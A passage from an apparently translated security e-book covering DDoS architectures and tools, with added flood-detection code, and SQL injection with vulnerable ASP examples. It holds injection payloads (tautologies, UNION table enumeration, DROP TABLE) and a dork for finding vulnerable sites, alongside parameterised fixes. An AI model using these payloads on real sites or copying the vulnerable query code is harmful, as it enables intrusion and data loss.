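    recs += [(9.5 + i * 0.01, "udp", "203.0.113.9", "10.0.0.2", 1024 + i, frozenset()) for i in range(25)]
    # Smurf: echo request to the broadcast address, spoofed from the victim
    recs.append((9.9, "icmp", "10.0.0.1", "192.168.1.255", 0, "echo-request"))
    return recs


if __name__ == "__main__":
    for kind, addr in detect(sample_records()):
        print(f"{kind:14} {addr}")
```

Feeding detect() from a capture means mapping each packet to the record tuple above; the thresholds are starting points to tune against the normal connection rate of the server being protected.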
2.2.2. DDoS (Distributed Denial of Service)
- Distributed Denial of Service (DDoS) is an attack technique that worries ISPs; mainstream hackers do not recognise DDoS as a legitimate attack technique. Nevertheless, black hats enjoy many advantages when mounting attacks with DDoS. Prevention and blocking of DDoS still operate at the level of damage recovery and tracing the perpetrator.
2.2.2.1. Phases of a DDoS attack:
There are 3 phases:
i. Preparation phase:
- Prepare the main tool of the attack; this tool normally works on the client-server model. The hacker can write this software or download it easily; by a rough count there are more than 10 DDoS tools available for free on the net (these tools are analysed in detail in a later section).
- Next, use other hacking techniques to take full control of a number of hosts on the net. The necessary software is installed on these hosts, and the configuration and testing of the whole attack-network (comprising the network of compromised machines with the software set up on them, plus the hacker's machine or other machines set up as launch points for the attack) is also carried out in this phase.
ii. Target and timing phase:
- After the target is finally chosen, the hacker adjusts the attack-network to direct the attack at the target.
- The timing decides the extent of the damage and how quickly the target can respond to the attack.
iii. Launching the attack and removing traces:
- At the chosen moment the hacker launches the attack from their own machine; the attack command may pass through several layers before reaching the hosts that actually attack. The whole attack-network (possibly thousands of machines) continuously drains the capacity of the target server, preventing it from working as designed.
- After a suitable period of attack, the hacker removes every trace that could be followed back to them; this requires a high level of skill and is not absolutely necessary.
2.2.2.2. General architecture of the DDoS attack-network
Broadly, a DDoS attack-network follows one of two main models:
The Agent-Handler model
The IRC-Based model
Figure 2 (diagram; only its labels survive): a DDoS attack-network is either Agent-Handler, with Client-Handler communication over TCP, UDP or ICMP, or IRC-Based, with Client-Handler communication over TCP, UDP or ICMP through a secret/private channel or a public channel.
Figure 2. Classification diagram of DDoS attack types


i. The Agent-Handler model:
In this model the attack-network consists of 3 components: Agent, Client and Handler.
Client: the base software through which the hacker controls all activity of the attack-network.
Handler: an intermediate software component between the Agents and the Client.
Agent: the software component that carries out the attack on the target, taking control from the Client through the Handlers.
Figure 3 (diagram; only its labels survive): Attackers send to Handlers, Handlers to Agents, and the Agents attack the Victim.
Figure 3. Architecture of an Agent-Handler attack-network
- From the Client the attacker communicates with the Handlers to determine how many Agents are online, adjust the time of the attack and update the Agents. Depending on how the attacker configures the attack-network, the Agents are managed by one or several Handlers.
- The attacker usually places the Handler software on a router or a server that carries a lot of traffic. This is meant to make the communication between Client, Handler and Agents hard to detect. This communication normally takes place over the TCP, UDP or ICMP protocols. The real owners of the Agents usually have no idea that they are being used in a DDoS attack, either because they lack the knowledge or because the Backdoor Agent programs use so little system resource that no effect on system performance can be seen.
ii. The IRC-Based model:
- Internet Relay Chat (IRC) is a multi-user online chat system; IRC lets a user open a multipoint connection to many other users and chat in real time. The architecture of an IRC network comprises many IRC servers across the Internet communicating with each other on many channels. An IRC network lets users create three kinds of channel: public, private and secret.
Public channel: lets users of the channel see the IRC names and receive the messages of every other user on the same channel.
Private channel: designed for communication among permitted parties. Users not on the channel cannot see the IRC names or messages on the channel. However, a user outside the channel can use certain channel-locator commands to learn that the private channel exists.
Secret channel: like a private channel, but cannot be found with the channel locator.



Figure 4 (diagram; only its labels survive): Attackers connect through the IRC NETWORK to the Agents, which attack the Victim.
Figure 4. Architecture of an IRC-Based attack-network
- An IRC-Based network is similar to an Agent-Handler network, but this model uses IRC channels as the means of communication between Client and Agents (no Handler is used). With this model the attacker gains some further advantages:
Communication in the form of chat messages makes detection extremely difficult.
IRC traffic can move across the network in large volumes without raising suspicion.
There is no need to maintain a list of Agents; the hacker only has to log on to the IRC server to receive status reports on the Agents sent back through the channels.
Finally, IRC is also a file-sharing environment, which makes it easy to spread the Agent code to many more machines.
2.2.2.3. Classification of DDoS attacks
- In general there are many variants of the DDoS technique, but from a technical point of view they can be divided into two classes according to the attack's aim: bandwidth depletion and system resource depletion.



Figure 5 (diagram; only its labels survive). Classification of DDoS attacks:
DDoS attack
  Bandwidth Depletion
    Flood Attack: UDP attack (random port attack, static port attack); ICMP attack (spoof source attack, direct attack, loop attack)
    Amplification Attack: Smurf attack (spoof source attack); Fraggle attack (spoof source attack)
  Resource Depletion
    Protocol Exploit Attack: TCP SYN attack (spoof source attack); PUSH + ACK attack
    Malformed Packet Attack: IP @ attack; IP packet options attack
Figure 5. Classification of attack types
i. Attacks that exhaust network bandwidth (Bandwidth Depletion Attack)
- A bandwidth depletion attack is designed to flood the target network with useless traffic, so that as little legitimate traffic as possible reaches the system providing the target's service.
- There are two kinds of bandwidth depletion attack:
+ Flood attack: the Agents are directed to send a large volume of traffic to the target's service, exhausting its capacity and its bandwidth.
+ Amplification attack: the Agents, or the Client itself, are directed to send messages to a broadcast IP address, so that every host in that subnet sends a message to the target's service. This multiplies the useless traffic and consumes the target's bandwidth.
Flood attack:
In this method the Agents send a large volume of IP traffic so that the target's service slows down, hangs or reaches saturation, and the system's real users can no longer use the service.
Flood attacks divide into two types:
+ UDP flood attack: because UDP is connectionless, a system receiving UDP messages simply accepts every packet it is sent and must process it. A large number of UDP packets sent to the target's service pushes the whole system to its limit.
+ The UDP packets may be sent to many arbitrary ports or to a single port. Usually they are sent to many ports, so the target must work out how to handle each packet. If the attacked port has no listener, the target answers with an ICMP "destination port unreachable" packet. Agent software normally uses spoofed source IP addresses to hide its tracks, so these replies for unhandled ports are delivered to some other IP address. A UDP flood can also degrade the connections around the target, because the packets converge on it so intensely.
+ ICMP flood attack: ICMP is designed for network management and for locating network devices. When the Agents send a large number of ICMP ECHO_REQUEST packets (pings) to the target, it has to answer with an equal number of ECHO_REPLY packets, which congests the link. As above, the Agents' source IP addresses may be spoofed.
Amplification attack:
- An amplification attack abuses the IP broadcast support of routers to amplify and reflect the attack. This feature lets a sender specify a single broadcast address for a whole subnet instead of many individual addresses; the router then delivers the broadcast packet it receives to every IP address in the subnet.
- The attacker can send the broadcast message directly or through a number of Agents, to increase the intensity of the attack. If the attacker sends the message directly, the hosts inside the broadcast network are effectively used as Agents.

Figure 6. Diagram of an amplification attack: the attacker or Agent sends to the amplifier network, and every host in it replies to the victim.


Amplification attacks divide into two kinds, Smurf and Fraggle:
+ Smurf attack: the attacker sends packets to a network amplifier (a router or other network device that supports broadcast) with the victim's address as the source. The packets are usually ICMP ECHO REQUEST, which ask the receiver to answer with an ICMP ECHO REPLY. The network amplifier delivers the ECHO REQUEST to every host on the broadcast address, and all of them send their REPLY to the IP address of the Smurf target.
+ Fraggle attack: like Smurf, but UDP ECHO packets are sent to the target instead of ICMP ECHO REQUEST. There is a further variant of Fraggle that sends UDP ECHO packets to the target's chargen port (port 19 on UNIX) with the target's echo port (port 7 on UNIX) as the source, creating an endless loop. The attacker starts the attack with a single ECHO REQUEST whose destination is a broadcast address; every host on that address immediately sends a REPLY to the victim's echo port, the victim answers each with an ECHO REPLY back to the broadcast address, and the cycle continues. This is why Fraggle is far more dangerous than Smurf.
ii. Attacks that exhaust resources (Resource Depletion Attack)
- By definition, a resource depletion attack is one in which the attacker sends packets that use a protocol contrary to its designed purpose, or packets crafted to clog network resources, so that those resources can no longer serve ordinary users.
ii.a/ Protocol exploit attack:
+ TCP SYN attack: TCP provides reliable transfer, so it performs a handshake between sender and receiver before any data is transferred. First, the sender sends a SYN (synchronize) packet. If the receiver gets the SYN, it answers with a SYN/ACK packet. Finally, the sender transmits the last packet, the ACK, and begins sending data.
Figure 7. TCP SYN attack: the client, from an ephemeral port (1024-65535), sends SYN to the server's service port (1-1023, e.g. 80); the server answers SYN/ACK; the client completes the handshake with ACK.
- If the server has answered a SYN with a SYN/ACK but receives no final ACK within the allotted time, it retransmits the SYN/ACK until the timeout expires. All of the system resources reserved to handle that session while it waits for the final ACK stay blocked until the timeout.
- Knowing this weakness, the attacker sends SYN packets to the victim with forged source addresses. The victim sends its SYN/ACK to an address that will never answer and so never receives the final ACK; only when the timeout expires does it notice and release the resources. If forged SYN packets arrive in large numbers and in quick succession, the victim's system runs out of resources.
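As an added example (not code from the e-book), the following Python detector applies the three flood signatures described above to a packet capture: TCP SYN floods (many sources that sent a SYN but never the final ACK), UDP floods (datagram volume per destination and how many ports it was spread over) and reflected ICMP from a Smurf-style amplification (echo replies arriving from many hosts the victim never pinged). The packet records, addresses and thresholds are constructed for the example.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str            # "tcp", "udp" or "icmp"
    flags: str = ""       # TCP flags: "S" = SYN, "SA" = SYN/ACK, "A" = ACK
    dport: int = 0        # destination port for tcp/udp
    icmp_type: int = -1   # 8 = echo request, 0 = echo reply


def detect_syn_flood(packets, threshold=50):
    """SYN flood: destinations with >= threshold sources that sent a SYN but never
    an ACK (half-open connections, typically because the source was spoofed)."""
    syn_sources = defaultdict(set)
    ack_sources = defaultdict(set)
    for p in packets:
        if p.proto != "tcp":
            continue
        if p.flags == "S":
            syn_sources[p.dst].add(p.src)
        elif p.flags == "A":
            ack_sources[p.dst].add(p.src)
    half_open = {dst: len(srcs - ack_sources[dst]) for dst, srcs in syn_sources.items()}
    return {dst: n for dst, n in half_open.items() if n >= threshold}


def detect_udp_flood(packets, threshold=100):
    """UDP flood: destinations receiving >= threshold datagrams; the distinct-port
    count shows whether the flood hit random ports or a single one."""
    count = Counter()
    ports = defaultdict(set)
    for p in packets:
        if p.proto == "udp":
            count[p.dst] += 1
            ports[p.dst].add(p.dport)
    return {dst: (n, len(ports[dst])) for dst, n in count.items() if n >= threshold}


def detect_reflected_icmp(packets, min_sources=10):
    """Smurf indicator: a host receives echo replies from >= min_sources hosts it
    never sent an echo request to, i.e. its address was used as the forged source."""
    requested = {(p.src, p.dst) for p in packets if p.proto == "icmp" and p.icmp_type == 8}
    unsolicited = defaultdict(set)
    for p in packets:
        if p.proto == "icmp" and p.icmp_type == 0 and (p.dst, p.src) not in requested:
            unsolicited[p.dst].add(p.src)
    return {dst: len(s) for dst, s in unsolicited.items() if len(s) >= min_sources}


VICTIM = "192.0.2.10"   # constructed address of the attacked server


def sample_traffic():
    """Constructed capture: one legitimate handshake and ping, then the three floods."""
    pkts = [
        Packet("10.0.0.5", VICTIM, "tcp", "S", 80),
        Packet(VICTIM, "10.0.0.5", "tcp", "SA", 40000),
        Packet("10.0.0.5", VICTIM, "tcp", "A", 80),
        Packet(VICTIM, "10.0.0.9", "icmp", icmp_type=8),
        Packet("10.0.0.9", VICTIM, "icmp", icmp_type=0),
    ]
    # 60 SYNs from forged sources that never complete the handshake
    pkts += [Packet("203.0.113.%d" % i, VICTIM, "tcp", "S", 80) for i in range(1, 61)]
    # 120 UDP datagrams sprayed over 40 ports
    pkts += [Packet("198.51.100.7", VICTIM, "udp", dport=1000 + (i % 40)) for i in range(120)]
    # 25 echo replies from a broadcast subnet the victim never pinged
    pkts += [Packet("192.168.1.%d" % i, VICTIM, "icmp", icmp_type=0) for i in range(1, 26)]
    return pkts


if __name__ == "__main__":
    traffic = sample_traffic()
    print("SYN flood:", detect_syn_flood(traffic))          # {'192.0.2.10': 60}
    print("UDP flood:", detect_udp_flood(traffic))          # {'192.0.2.10': (120, 40)}
    print("Reflected ICMP:", detect_reflected_icmp(traffic))  # {'192.0.2.10': 25}
```

The legitimate client and the legitimate ping are not reported: the client's SYN is matched by its ACK, and the reply from 10.0.0.9 is matched by the victim's own request. In production the same counters would be kept per time window rather than over a whole capture, and the thresholds tuned to the normal connection rate of the service.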

Figure 8. The attacker forges the IP address: SYNs from the attacker or Agent carry a spoofed client address, the server's SYN/ACKs go to that address, and the final ACK never arrives.
+ PUSH + ACK attack: in TCP, incoming packets are held in a buffer, and when the buffer is full they are passed on to where they are needed. The sender can, however, ask the receiving system to unload the buffer before it is full by sending a packet with the PUSH and ACK bits both set to 1. Such packets make the victim flush all data in its TCP buffer immediately and send back an ACK when done; if many Agents do this continuously, the system cannot keep up with the incoming packets and hangs.
ii.b/ Malformed packet attack:
- A malformed packet attack uses the Agents to send packets with an incorrect structure, in order to make the victim's system hang.
There are two kinds of malformed packet attack:
+ IP address attack: uses packets whose source and destination addresses are identical; the victim's operating system cannot handle them and hangs.
+ IP packet options attack: randomises the OPTIONS field of the IP packet and sets every QoS bit to 1, so the victim must spend time parsing it; with a large number of Agents this can exhaust the victim's processing capacity.
ii.c/ Some characteristics of DDoS attack tools:

Figure 9. Characteristics of DDoS attack tools
- Attack network: Agent-Handler (client, handler, agent) or IRC-based (private/secret channel, public channel)
- Agent setup: installation method, active (scanning, backdoor, trojan, buffer overflow) or passive (bugged website, corrupted file); hidden with a rootkit (yes/no)
- OS supported: Unix, Solaris, Linux, Windows
- Communication: protocol (TCP, UDP, ICMP); encryption (yes/no/none); agent activation (actively poll, live and wait)

- The DDoS attack tools have a great deal of software in common: the way the Agent software is installed, the methods of communication between attacker, Handler and Agents, and the operating systems the tools support. The figure above compares the DDoS attack tools on these points.
* Installing DDoS Agents:
- The attacker can use active or passive methods to install Agent software on other machines in order to build an Agent-Handler or IRC-based attack network.
- Active installation:
+ Scanning: tools such as Nmap and Nessus are used to find weaknesses on systems that are online, in order to install Agent software on them. Note that Nmap returns information about a system identified by its IP address, whereas Nessus searches arbitrary IP addresses for a particular known weakness.
+ Backdoor: having found a list of systems that can be exploited, the attacker breaks into them and installs the Agent software. A great deal of information on break-in techniques is publicly available, for example the site of the Common Vulnerabilities and Exposures (CVE) project, which lists and classifies over 4,000 vulnerabilities across all existing systems. This information is available to administrators and hackers alike.



+ Trojan: a program that performs some ordinary function but also carries hidden functionality serving the author's own purposes, which the user cannot see. A trojan can be used as Agent software.
+ Buffer overflow: by exploiting a buffer overflow, the attacker can divert the program's normal flow of execution into code of the attacker's own (placed in the data area that was overwritten). This can be used against a program with a buffer overflow weakness to make it run the Agent software.
- Passive installation:
+ Bugged website: the attacker can exploit flaws in the web browser to install Agent software on the machine of a user who visits a site. The attacker builds a website whose content conceals code and commands to trap the user; when the user views the site, it downloads and installs the Agent software silently. Microsoft Internet Explorer has been a frequent target of this method, with ActiveX flaws that let the browser download and install code on the user's machine automatically.
+ Corrupted file: another method is to embed code in ordinary-looking files. When the user opens or executes such a file, the machine is immediately infected with the Agent software. One common trick is a very long filename: because operating systems by default display only the beginning of the name, the attacker can email the victim a file such as iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe. Only the part iloveyou.txt is visible, so the user opens it to read it, the file executes and the Agent code is installed. There are many other methods as well, such as disguising or binding files.
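The long-filename trick above is easy to check for at a mail gateway or upload handler. As an added example (not code from the e-book), the following Python function takes the extension the operating system will actually act on (the last one) and flags the attachment when that extension is executable and is either pushed past the part of the name a width-limited display would show, or preceded by a decoy document extension. The list of executable extensions, the decoy pattern and the display width are assumptions for the example.

```python
import re

# Extensions the operating system will execute directly (assumed list for the example).
EXECUTABLE_EXTENSIONS = {"exe", "com", "scr", "pif", "bat", "cmd", "vbs", "js"}
# A document-looking extension that is not actually the last one in the name.
DECOY_RE = re.compile(r"\.(txt|doc|pdf|jpg|gif|xls)(?=[._\-])", re.I)


def true_extension(filename):
    """The extension that decides execution is the last one, whatever the name shows first."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def is_disguised_executable(filename, visible_chars=20):
    """True when the real extension is executable and is hidden beyond the first
    visible_chars characters of the name, or is preceded by a decoy extension."""
    ext = true_extension(filename)
    if ext not in EXECUTABLE_EXTENSIONS:
        return False
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    hidden = len(base) - len(ext) - 1 >= visible_chars   # the ".exe" starts past the visible part
    decoy = DECOY_RE.search(base) is not None
    return hidden or decoy


if __name__ == "__main__":
    # The sample name is the one quoted in the text; the others are constructed.
    for name in ("iloveyou.txt_hiiiiiii_NO_this_is_DDoS.exe", "photo.jpg.exe", "setup.exe", "report.pdf"):
        print(name, "->", is_disguised_executable(name))
```

A plain setup.exe is not flagged: the check targets disguise, not executables as such, which a gateway would handle by policy.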
- Rootkit: a program used to erase the traces and hide the presence of an Agent or Handler on the victim's machine. Rootkits are generally used on machines where Handler software has been installed, because the Handler is critical to the operation of the attack network, or in environments where the chance of the Handler being detected is high. Rootkits are rarely used on Agents, because an Agent is much less important: losing a few Agents does not affect the attack network much.
* Communication on the attack network:
- Protocol: communication on the attack network can be carried over TCP, UDP or ICMP.
- Encrypting the communication: some DDoS tools support encrypting the communication across the whole attack network, with a method suited to the protocol in use. If the attack network is IRC-based, private and secret channels at least hide the channel and its members from outsiders, although they do not by themselves encrypt the traffic.
- Activating the Agents: there are two main methods. In the first, the Agent regularly polls the Handler or the IRC channel for instructions (active Agent). In the second, the Agent simply lies dormant and waits for instructions from the Handler or the IRC channel.
ii.d. Some DDoS tools:
On the common basis described above, many tools have been written. They are usually open source, so their complexity keeps growing and new variants keep appearing.
* Agent-Handler DDoS tools:
- TrinOO: one of the first DDoS tools to be distributed widely. TrinOO has an Agent-Handler architecture and is a bandwidth depletion tool using UDP flood. Its early versions did not support IP address spoofing. TrinOO Agents were installed by exploiting a remote buffer overrun. It ran on Solaris 2.5.1 and Red Hat Linux 6.0. The attack network communicated over TCP (attacker client to Handler) and UDP (Handler to Agent), with symmetric encryption between Client, Handler and Agent.
- Tribe Flood Network (TFN): Agent-Handler architecture; supports both bandwidth depletion and resource depletion attacks, using UDP flood, ICMP flood, TCP SYN and Smurf. Early versions did not support IP spoofing; TFN Agents were installed via buffer overflow. It ran on Solaris 2.x and Red Hat Linux 6.0. The attack network communicated with ICMP ECHO REPLY packets (TFN2K added TCP/UDP with a selectable protocol) and the communication was not encrypted (TFN2K supports encryption).
- Stacheldraht: a variant of TFN that adds automatic Agent updates. Communication between attacker and Handler is over telnet with symmetric encryption.
- Shaft: a variant of TrinOO; Handler-Agent communication is over UDP, attacker-Handler over a TCP connection across the Internet. It attacks with UDP, ICMP and TCP floods and can combine several at once. It keeps detailed statistics that let the attacker judge the damage to the victim and the scale of the attack, and adjust the number of Agents accordingly.
* IRC-based DDoS tools:
IRC-based DDoS tools were developed after the Agent-Handler tools. They are considerably more complex, because they integrate many of the features of the Agent-Handler tools.
- Trinity is a typical tool of this kind. Trinity has most attack techniques: UDP, TCP SYN, TCP ACK, TCP fragment, TCP NULL, TCP RST, TCP random flag and TCP ESTABLISHED packet floods. It can randomise the source address, and it supports TCP flood packets with randomised control flags. Trinity can be counted among the most dangerous DDoS tools.
- Other DDoS tools worth mentioning include Knight, designed to run on Windows and installed using the technique of the Back Orifice trojan. Knight uses SYN, UDP flood and urgent pointer flooder attacks.
- Finally there is Kaiten, a variant of Knight, which supports many techniques: UDP, TCP flood, SYN and PUSH+ACK attacks. Kaiten also inherits Trinity's ability to randomise the forged source address.
2.2.3. Distributed Reflection Denial of Service (DRDoS)
DRDoS appeared in early 2002 and was, at the time, the newest and most powerful attack in the DoS family. Carried out by a skilled attacker, it can take down any system in moments.
- The main goal of DRDoS is to seize all of the server's bandwidth, that is, to block the link from the server to the Internet backbone completely, and to consume the server's resources. While the server is under DRDoS attack, no client can connect to it. Every service running over TCP/IP, such as DNS, HTTP, FTP and POP3, is disabled.
- DRDoS is essentially a combination of DoS and DDoS. It is a SYN attack from a single computer, and at the same time it uses many computers to consume bandwidth as DDoS does. The attacker forges the address of the target server and sends SYN requests to large servers such as those of Yahoo and Microsoft; those servers send their SYN/ACK packets to the target server. The large servers, with their powerful links, unwittingly play the role of zombies for the attacker, as in DDoS.
Figure 10. Diagram of a DRDoS attack
- The sending is repeated continuously with many forged IP addresses, and with many large servers taking part the target server is quickly overloaded, its bandwidth consumed by the large servers. The art of it is that with a single computer on a 56 kbps modem, a skilled hacker can defeat any server in an instant without compromising a single machine to use as a tool.
2.3. SQL Injection
2.3.1. SQL injection attacks
2.3.1.1. What is SQL injection?
- When deploying web applications on the Internet, many people still assume that keeping them secure, so as to minimise the chance of attack by hackers, simply means choosing the operating system, the database management system, the web server that will run the application, and so on. They forget that the application itself may contain a very serious security hole. One such hole is SQL injection. In Vietnam, for a long time administrators have concentrated on scanning for viruses and applying patches to system software, while flaws in the applications themselves received very little attention. That is why, in recent years, a good many websites in Vietnam have been attacked, mostly through SQL injection. So what is SQL injection?
- SQL injection is a technique that lets an attacker exploit weak input validation in a web application, together with the error messages of the database management system, to "inject" and execute SQL statements that the application's developer never intended. The consequences are severe: the attacker can delete or modify data, and so gain full control over the application's database and even over the server the application runs on. The flaw typically appears in web applications whose data is held in a database management system such as SQL Server, MySQL, Oracle, DB2 or Sybase.
2.3.1.2. Types of SQL injection attack
- There are four common forms: bypassing the login check (authorization bypass), using the SELECT statement, using the INSERT statement, and using stored procedures.
- To find shopping websites that use an SQL database, one can use vulnerability-scanning tools, or a search engine such as Google with a dork such as: inurl:product.php?id=
Figure 11. An online tool for finding vulnerable sites
- To check whether a website is vulnerable to SQL injection, append a single quote (') to the URL in the address bar.
Example: http://www.doanchuyenganh.com/product.php?id=123'
Figure 12. A site vulnerable to SQL injection
A database error after the quote shows that the input reaches the query unescaped; it is a strong indicator, not a proof, and its absence does not mean the site is safe, since many applications hide errors while still being injectable.
i. Login bypass attack
- With this form of attack, the hacker can easily get past login pages thanks to flaws in the way the web application builds the SQL statements that operate on its database.
Consider a typical example. To let users reach protected pages, a system usually provides a login page asking for a username and password. After the user enters them, the system checks whether the username and password are valid and decides whether to allow or refuse access. In this case two pages may be used: an HTML page that shows the input form and an ASP page that processes what the user entered. Example: login.htm
<form action="ExecLogin.asp" method="post">
Username: <input type="text" name="fUSRNAME"><br>
Password: <input type="password" name="fPASSWORD"><br>
<input type="submit">
</form>
execlogin.asp
<%
Dim vUsrName, vPassword, objRS, strSQL
vUsrName = Request.Form("fUSRNAME")
vPassword = Request.Form("fPASSWORD")
' The form fields are concatenated straight into the SQL text (the flaw discussed below).
strSQL = "SELECT * FROM T_USERS " & _
"WHERE USR_NAME='" & vUsrName & _
"' AND USR_PASSWORD='" & vPassword & "'"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
If (objRS.EOF) Then
Response.Write "Invalid login."
Else
Response.Write "You are logged in as " & objRS("USR_NAME")
End If
Set objRS = Nothing
%>
- At first glance the code in execlogin.asp seems to contain no security hole: a user cannot log in without a valid username and password. In fact the code is unsafe and is the starting point for an SQL injection flaw. The weakness lies in using the user's input directly to build the SQL statement, which lets an attacker control the query that will be executed. For example, if the user enters the following string in both the username and password fields of login.htm: ' OR ''=' the query sent for execution becomes:
SELECT * FROM T_USERS WHERE USR_NAME='' OR ''='' AND USR_PASSWORD='' OR ''=''
- This query is syntactically valid and returns every record in T_USERS, so the code that follows treats this illegitimate visitor as a properly logged-in user.
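The following is an added example, not code from the e-book: the same login in Python against an in-memory SQLite database, first built by concatenation exactly as execlogin.asp does, then with bound parameters, which is the fix. The table contents are constructed sample data, and passwords are stored in clear only to mirror the ASP page.

```python
import sqlite3


def setup_db():
    """Constructed stand-in for T_USERS (sample rows, not the e-book's data)."""
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE T_USERS (USR_NAME TEXT, USR_PASSWORD TEXT)")
    cn.executemany("INSERT INTO T_USERS VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return cn


def login_vulnerable(cn, username, password):
    """Same construction as execlogin.asp: the form fields become part of the SQL text."""
    sql = ("SELECT USR_NAME FROM T_USERS WHERE USR_NAME='" + username +
           "' AND USR_PASSWORD='" + password + "'")
    row = cn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(cn, username, password):
    """The fix: the statement is fixed text and the values travel as bound parameters,
    so a quote in the input is just a character in a string, never SQL syntax."""
    sql = "SELECT USR_NAME FROM T_USERS WHERE USR_NAME=? AND USR_PASSWORD=?"
    row = cn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


BYPASS = "' OR ''='"        # the payload from the text, entered in both fields
COMMENT_OUT = "bob'--"       # log in as a chosen user: the -- comments out the password check

if __name__ == "__main__":
    cn = setup_db()
    print(login_vulnerable(cn, BYPASS, BYPASS))         # alice
    print(login_vulnerable(cn, COMMENT_OUT, "anything"))  # bob
    print(login_parameterised(cn, BYPASS, BYPASS))      # None
```

With the tautology payload the vulnerable query matches every row and the first one (alice) is returned, so the attacker is logged in as whoever happens to be first in the table; with the comment payload the attacker picks the account. The parameterised version returns nothing for both, because the database compares the whole string ' OR ''=' against the column.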
ii. Attack using the SELECT statement
- This form of attack is more involved. To carry it out, the attacker must be able to read and exploit the system's error messages in order to find the weak points from which to start. Consider a very common example on news websites: a page receives the ID of the item to display and then queries the content of the item with that ID.
Example: http://www.doanchuyennganh.com/product.asp?ID=123. The code for this function is usually written quite simply, along these lines:
<%
Dim vNewsID, objRS, strSQL
vNewsID = Request("ID")
' The ID is concatenated unquoted into the query, so anything after the number is executed as SQL.
strSQL = "SELECT * FROM T_NEWS WHERE NEWS_ID=" & vNewsID
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
- Normally this code displays the content of the item whose ID matches the one supplied, and no flaw is apparent. However, just as in the login example, the code is open to another SQL injection. The attacker can replace a valid ID with a different value and, from there, begin an attack, for example: 0 OR 1=1 (that is, http://www.doanchuyennganh.com/product.asp?ID=0 or 1=1).
- The SQL query now returns every article in the table, because the statement executed is:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
- Another case is a search page that lets the user enter search terms such as a first name or surname. The usual code is:
<%
Dim vAuthorName, objRS, strSQL
vAuthorName = Request("fAUTHOR_NAME")
strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME='" & _
vAuthorName & "'"
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
Set objRS = Nothing
%>
- As before, the hacker can exploit the weakness in the SQL query by entering the following string in the author name field:
' UNION ALL SELECT OtherField FROM OtherTable WHERE ''='   (*)
- Now, besides the first query, which returns nothing, the program also executes the statement that follows the UNION keyword.
- The examples above look harmless, but consider that the attacker could wipe the whole database by injecting dangerous statements such as DROP TABLE, for example: ' DROP TABLE T_AUTHORS --
You may wonder how one knows that a web application is vulnerable in this way. It is simple: enter the string (*) above, and if the system reports a syntax error of the form Invalid object name 'OtherTable', it is certain that the system executed the SELECT after the UNION keyword, which is the only way it could have produced the error we deliberately provoked in that SELECT.
- You may also wonder how to learn the names of the tables in order to do damage once the application is found to be vulnerable. That is simple too: in SQL Server, the objects sysobjects and syscolumns list the names of every table and column in the system. Only the SELECT needs adjusting, for example:
' UNION SELECT name FROM sysobjects WHERE xtype='U'--
which lists the names of all user tables.
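The three steps described above (the tautology on an unquoted numeric ID, the UNION probe that leaks an error message, and the UNION that enumerates tables) are shown below in an added Python example that is not code from the e-book. It runs against SQLite, so the catalogue table is sqlite_master rather than SQL Server's sysobjects, and the error text is SQLite's "no such table" rather than "Invalid object name"; the schema and rows are constructed.

```python
import sqlite3


def setup_db():
    """Constructed sample schema (not the e-book's data)."""
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE T_NEWS (NEWS_ID INTEGER, TITLE TEXT)")
    cn.executemany("INSERT INTO T_NEWS VALUES (?, ?)",
                   [(1, "First story"), (2, "Second story"), (3, "Third story")])
    cn.execute("CREATE TABLE T_AUTHORS (AUTHOR_NAME TEXT)")
    cn.executemany("INSERT INTO T_AUTHORS VALUES (?)", [("Quentin",), ("O'Brien",)])
    return cn


def news_vulnerable(cn, news_id):
    """The product.asp pattern: the ID is pasted, unquoted, into the query."""
    sql = "SELECT NEWS_ID, TITLE FROM T_NEWS WHERE NEWS_ID = " + news_id
    return cn.execute(sql).fetchall()


def news_safe(cn, news_id):
    """Convert to int first (rejects '0 OR 1=1' with ValueError), then bind the value."""
    nid = int(news_id)
    return cn.execute("SELECT NEWS_ID, TITLE FROM T_NEWS WHERE NEWS_ID = ?", (nid,)).fetchall()


def search_authors_vulnerable(cn, name):
    """The search page pattern: a quoted string value built by concatenation."""
    sql = "SELECT AUTHOR_NAME FROM T_AUTHORS WHERE AUTHOR_NAME = '" + name + "'"
    return [r[0] for r in cn.execute(sql).fetchall()]


def probe_error(cn, name):
    """What a verbose error page hands the attacker: the driver's message, or None."""
    try:
        search_authors_vulnerable(cn, name)
        return None
    except sqlite3.Error as exc:
        return str(exc)


TAUTOLOGY = "0 OR 1=1"
PROBE = "' UNION ALL SELECT OtherField FROM OtherTable WHERE ''='"
# sqlite_master plays the role of sysobjects; the trailing -- comments out the closing quote.
LIST_TABLES = "' UNION ALL SELECT name FROM sqlite_master WHERE type='table' --"

if __name__ == "__main__":
    cn = setup_db()
    print(news_vulnerable(cn, TAUTOLOGY))                 # all three stories
    print(probe_error(cn, PROBE))                         # no such table: OtherTable
    print(search_authors_vulnerable(cn, LIST_TABLES))     # ['T_NEWS', 'T_AUTHORS']
```

Python's sqlite3 driver refuses to run more than one statement per execute() call, so the stacked ' DROP TABLE T_AUTHORS -- payload from the text is not reproducible here; SQL Server batches do allow it, which is one reason the same injection point is far more damaging there.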
iii. Attack using the INSERT statement
- Web applications usually let users register an account in order to take part. An indispensable feature is that, once registered, the user can view and edit their own information. SQL injection can be used here when the system does not validate the information entered.
For example, an INSERT statement has the form:
INSERT INTO TableName VALUES('Value One', 'Value Two', 'Value Three')
If the code that builds the statement looks like this:
<%
strSQL = "INSERT INTO TableName VALUES('" & strValueOne & "', '" _
& strValueTwo & "', '" & strValueThree & "')"
Set objRS = Server.CreateObject("ADODB.Recordset")
